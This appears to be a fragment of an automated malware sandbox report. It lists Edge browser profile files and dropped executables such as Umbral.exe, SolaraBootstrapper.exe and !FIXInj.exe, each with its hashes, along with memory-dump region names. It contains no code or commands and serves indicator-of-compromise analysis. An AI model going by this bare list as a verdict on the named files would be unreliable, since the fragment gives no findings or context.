| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c22b8fdb9d69a17c492f51d4822f3b67 |
| SHA1 | d6f33387d754ff4f974c8d6b1a033844c5a1f4da |
| SHA256 | 7eb24fe024a49849f5e4550c6e74ba681cce730c19c3146160f54e1c5ded3a5d |
| SHA512 | 22201d74d5b1fe54eb4218f08cad21d277ad67ffe8f4ee13f840156fb93ca40b1d7065d4ce6b1a8a7e6f47845537517eb753011e957013fc57517bd04564dc80 |
memory/3628-3308-0x0000000005D30000-0x0000000005DC2000-memory.dmp
memory/3628-3313-0x0000000005E30000-0x0000000005E3A000-memory.dmp
memory/3628-3374-0x000000000BCC0000-0x000000000C3A0000-memory.dmp
memory/5736-3412-0x0000000000D70000-0x0000000002397000-memory.dmp
C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe
| MD5 | 6bb0ab3bcd076a01605f291b23ac11ba |
| SHA1 | c486e244a5458cb759b35c12b342a33230b19cdf |
| SHA256 | 959dafbfab08f5b96d806d4ad80e4c3360759c264d3028e35483a73a89aa1908 |
| SHA512 | d1123feb97fbf1593ce1df687b793a41f398c9a00437e6d40331ad63b35fc7706db32a0c6f0504cff72ea2c60775b14f4c0d5a8955988048bed5ba61fa007621 |
memory/5736-3466-0x0000000000D70000-0x0000000002397000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 38dc18b20cb8e19ff84b8437eb259e18 |
| SHA1 | 3ffe09cffac3b9d35cc6d4dc6910b0a91dea1f4e |
| SHA256 | cf1987132e6abec1d4b5c662070217ef14ae1008fa69dcb274c1abfb2bf0cce8 |
| SHA512 | bca30f4fd17e4b6ddbe7644ca59422643cf87695402e04c7f07d85ee5632fa20d5c0660ba6af309ca9033c4855ad13a8d6305a11eb1e25d93cc9b9dbdad75456 |
memory/5720-3481-0x00000000000D0000-0x00000000003F4000-memory.dmp
memory/6424-3483-0x0000000002480000-0x00000000024A4000-memory.dmp
memory/6424-3482-0x00000000002E0000-0x000000000036A000-memory.dmp
memory/6596-3492-0x000000001C410000-0x000000001C460000-memory.dmp
memory/6596-3493-0x000000001C520000-0x000000001C5D2000-memory.dmp
memory/6924-3509-0x0000016F9FBF0000-0x0000016F9FC12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4k4e4yv0.jls.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 3a1707a75029a7d714539d6d57db7fe3 |
| SHA1 | 0b6db8bdb9d7999473ffe9f2b694bf32e47aeaa3 |
| SHA256 | abb28f7e97d903c18fb6b5522a57dcc4a3fb8d4c3d568dd747706c7dd3bc5a00 |
| SHA512 | 09cbb5e3e4fb82b61c2d153403e8c209b7f109f19fbbcaafb1bb592924333b5dcba4db393f3c996a78136fe31d66f139b77e9ea32d624890aae6f55cf8bc3073 |
memory/6924-3578-0x0000016F9FF20000-0x0000016F9FF2C000-memory.dmp
memory/6924-3579-0x0000016F9FF50000-0x0000016F9FFAC000-memory.dmp
memory/6700-3581-0x0000000000400000-0x0000000000408000-memory.dmp
C:\Users\Admin\Pictures\l6lGezRTHj8HnL5T9Jiqd1RF.exe
| MD5 | 588ec1603a527f59a9ecef1204568bf8 |
| SHA1 | 5e81d422cda0defb546bbbdaef8751c767df0f29 |
| SHA256 | ba7bda2de36c9cab1835b62886b6df5ecbd930c653fac078246ce14c2c1c9b16 |
| SHA512 | 969baab4b3828c000e2291c5ebe718a8fc43b6ce118ccc743766162c3a623f9e32a66fb963672b73a7386d0881340ba247f0aef0046cacbe56a7926900c77821 |
memory/2216-3604-0x0000000000400000-0x000000000083E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
| MD5 | 06f13f50c4580846567a644eb03a11f2 |
| SHA1 | 39ee712b6dfc5a29a9c641d92c7467a2c4445984 |
| SHA256 | 0636e8f9816b17d7cff26ef5d280ce1c1aae992cda8165c6f4574029258a08a9 |
| SHA512 | f5166a295bb0960e59c176eefa89c341563fdf0eec23a45576e0ee5bf7e8271cc35eb9dd56b11d9c0bbe789f2eac112643108c46be3341fa332cfcf39b4a90b9 |
memory/4092-3619-0x0000000000010000-0x000000000005A000-memory.dmp
memory/1612-3632-0x0000000000BA0000-0x0000000000BAA000-memory.dmp
memory/1612-3641-0x0000000002DD0000-0x0000000002DDA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Umbral.exe
| MD5 | 9694195bfd2d5a2d219c548d8dc65cf0 |
| SHA1 | d1113d97bb1114025e9260e898f3a3048a5a6fda |
| SHA256 | c58b3fa42e404b4a095ee2959a7975b392d7d6b6af6e4d11c1431e3a430dfb6e |
| SHA512 | 24bb0f6432b221fe621d81a1c730bd473e9c295aa66a2b50cbe670ad2260f942a915f7f9aef65e6dc28320b8208fc712d9bfdc43dbc1a607ed9393bb5c17051a |
memory/6872-3645-0x00000210F5B00000-0x00000210F5B40000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe
| MD5 | ad8378c96a922dcfe813935d1eec9ae4 |
| SHA1 | 0e7ee31880298190258f5282f6cc2797fccdc134 |
| SHA256 | 9a7b8171f8c6bd4bb61b7d8baf7dab921983ab7767705c3f1e1265704599ab98 |
| SHA512 | d38a7581ef5c3dcc8752fc2465ad698605bbd38bf380201623265e5ef121510d3f34116438727e60b3832e867e2ed4fd52081d58690690ff98b28cde80f6af5f |
memory/2216-3689-0x0000000000400000-0x000000000083E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | de94da9f218e18936aee6923c483ec3c |
| SHA1 | d318589bd595e7a1b6a8106e88f62ac2dc6870bc |
| SHA256 | 2abf7d7032d6d940ed1cdd0a2b312b4fd0a5f1e2c5181174c3f8df21605e0671 |
| SHA512 | ccc2fa1abd53384e0888077f4eec4539bd27bb179244d6e033b4857c30fa61a598776352970f00dd06d64fbf8b9e3823341abdb0cda6f4de7b4281a474c5f238 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8cb9cdb1a0aec7a26ee723b6c3174342 |
| SHA1 | 353507cb03e4491ad8c2dce16e4cd65bbcb6097c |
| SHA256 | 6151c8640f23b0b66c005a179cfbd983a1db47e9f6b025b589695223d4a37e6f |
| SHA512 | 7d7db664ac2e858465be26d9d50d9f986073777d75a5b42def466dcfcf55ec75d885f2576347e2c0d5621924867d3f648e4c11086efb2a4d41d239793dca09f4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 94185dcdbe0dcb09cbd067f6b8354797 |
| SHA1 | d79a8feb340e5f88c1a7af2c2132dfc8b38e64b4 |
| SHA256 | 748216e0f767f83c80798867c992d755e68424d75ec66dcd9a56cab8bce410ca |
| SHA512 | f43bcd527909a78d75bd95000862d30775dcde3820c137fdaf58ecd39238ff33aac05575e999a3b4727ec7dcd33596d343c7bf749779a791238d38c0d4b3bbd0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | fc515bfc60adba798695e516dbf80ef1 |
| SHA1 | 6dc4722092af19a95e4d5a7b64dca9afc2ad30ad |
| SHA256 | 869b6e72ce52552fd50b7144ae06a81c389273f76f92cd08c1475514f516433d |
| SHA512 | 588d583a1ed21f03be83ca339eafa4339aca22b0c3bfe0ad9fbe44bec6ae20c0e82210f07476926ae29cfb24ad7ca482e9e7282a99c67efe80dc7bd0762abdc4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 012c8fb85ef425d969add6fe54956ee1 |
| SHA1 | bf8c6c22bb5cea896677e2a6122b23c7621a8b40 |
| SHA256 | e700633039dbf7ced1b0e9d5aac030326597c46185589b1fd7108c851dd4f3e6 |
| SHA512 | 3331f6ca572e2439398070ddc26498aeb00c282d29ee584db0659ab4c482965e2d07ab5fcd2f9228bcc58f0bbce2ee70d3a36a3002cf70fde6c010af4a0b14a5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | b880b2918099acb956d03f5639082e85 |
| SHA1 | 8bd0d345a73f3a8ba6cc581213fff13dad197e14 |
| SHA256 | da6abdb948d5fabd29a6322ba79e37dc0f720b4a7794cc0c86b05db20d236108 |
| SHA512 | cb7548b4d717c77b68e71bd393dc8a16d6f362cabb3e5c48cae88987dc681e555a2703e6c02f313b33dc61256d28d71cb4af4ca8c85fd2baa14e5dc6f6eab28f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 452c0a6a8d36fcf032ac9cd058742275 |
| SHA1 | b301b125f82b3089b6daa9b8fc44356cc4ca582f |
| SHA256 | 154355b51edc5b84a9868120520494759e10b3831dec20235f541829d89dac4c |
| SHA512 | 6bc02baf11af203867a590ec47ea02c4ef787648229ec80305f605bf29b65e33e6672b8d1c7b025049231a1ddd8353ba6ad22b9ddebed3b99d081ccc5ae0d89a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 45607a0ea7364556bb3b7a9ab8818f25 |
| SHA1 | 74b42a95efedfdf83dced49d9f8a786a2585efc3 |
| SHA256 | 49bc7778e156d634b4ff2b6e95bcd03942e565645a39e5d2736be7b453b95daa |
| SHA512 | 6b76cbb6ac171e99e8e5b8a15c4cc7aa9c22a517c2e7e459e25614b9f0401dd952a235b6006131273908743717466c1b29740d3f10e52be98677e1fbf8410c53 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 311cf6edb71cc2358054f0d3497e99ad |
| SHA1 | 29c385e7be7b73221b1326b5fc37df298869bd8c |
| SHA256 | a3865ec0575be3883a1cea9d041ccb78fe7cccc9cae2711f2016a438030cf50f |
| SHA512 | fa5ef698d1b3eee17c74ce7f00ad90f36ea50362e40926c6c4f6ca1719585cd6d77bbe5347f1f47150b3c8ee4348f9711cf52cc54337ea534a4df016331629a3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 4ad0590f28cead0eec1a579bb9bfae93 |
| SHA1 | a567c1bc58e9c81a1715afe776acb6b366659b96 |
| SHA256 | 27d39d9553a2693f8c96a03fb446b22dcf527df7abf518548aff36258caf0f06 |
| SHA512 | e03b9e7e4b74337370b2f90d75d6e31bbc01c88d7e9cf92fab042c8add66c0b63f2a613f67f37e044ecbb521785e3fe30814b6e2264d93caa397744b6fcc4f14 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7a0353f32b160563acb1180333297dbb |
| SHA1 | ebd3e70cadd0cfff78db79e047ff33b9a69662f3 |
| SHA256 | e5771b33d3f3c49cde150d20722dfba1a16217279ad37a60517afd0a0d19f2bd |
| SHA512 | 41fabcd74409152f5b7a0f8c738a23596cac5022cc3773dc2955e8e7f316c6df1b7b221d630bd72f69c594dd911646a727948cf2d01a6e08e3166d4d3a61f683 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2a444e363dbc5abd014873bdd56ee4d6 |
| SHA1 | fd8535d3abdc749ece96eb41e61cfea09492ec5b |
| SHA256 | dbca54d8fd7e8536c51e292d0c5c86f229e5a79dd2d32c3ae75b2ffc009d4eec |
| SHA512 | 268f658b91eddc998d4b3b3ae204d9ae34bd115f441569cc510f1ff09f81acb2da4c57f9de9f85168da053fa76abef31cbcb27479e9c141290ed933715ed4d90 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | bc6b17810062a00aa5423831f7c2d5e7 |
| SHA1 | dd1a19da6d3fae5b2f33f80ce2ed933c593faa0f |
| SHA256 | b2a10d0a0f95fc126c42bb4b4627283934d3e8b37eb8746e72d3f2e5d695e0dd |
| SHA512 | ba51faeab4bb0fb6f02e3cfdeb72683066fe1262e89f4b79e895ee78c8642c8f4cd774990f4b147f4dd1b71b9fa1db5cbcb9c4271df1f81bfac64029e4756b47 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 420aeac16f39ea0f50bb4fedffdc8bdd |
| SHA1 | d703375e127c02bb57ea5c73758e53b440eff01c |
| SHA256 | 19c4aa5823cdb68cc8f63208f0e03ade76078b6738c14e0aaa265428526699f7 |
| SHA512 | 6971925b03831118e889304e200e74090f4108040efe9d594a2bdb6c50a34413cb233110ae1a6c316191aa0fc8c9102ab6aba879fb6ccd7cf75594c571cad52e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index
| MD5 | dce17b09e6e3fe92e5a1f753e57a4fbe |
| SHA1 | 77777e206f6aca53962ab094d0f724a0901d1fd6 |
| SHA256 | 42edd602da277c06b7e40e235b45e0db988812c2be86f18f58a7f3d9dae698b0 |
| SHA512 | 43723f058eb2b7b8cffff1b613b185bacee93d1936fb034613d2e15be598d1058d6ba8469fc5c7ec52b846586c69b51317c6916b468709935b08286422e6d08b |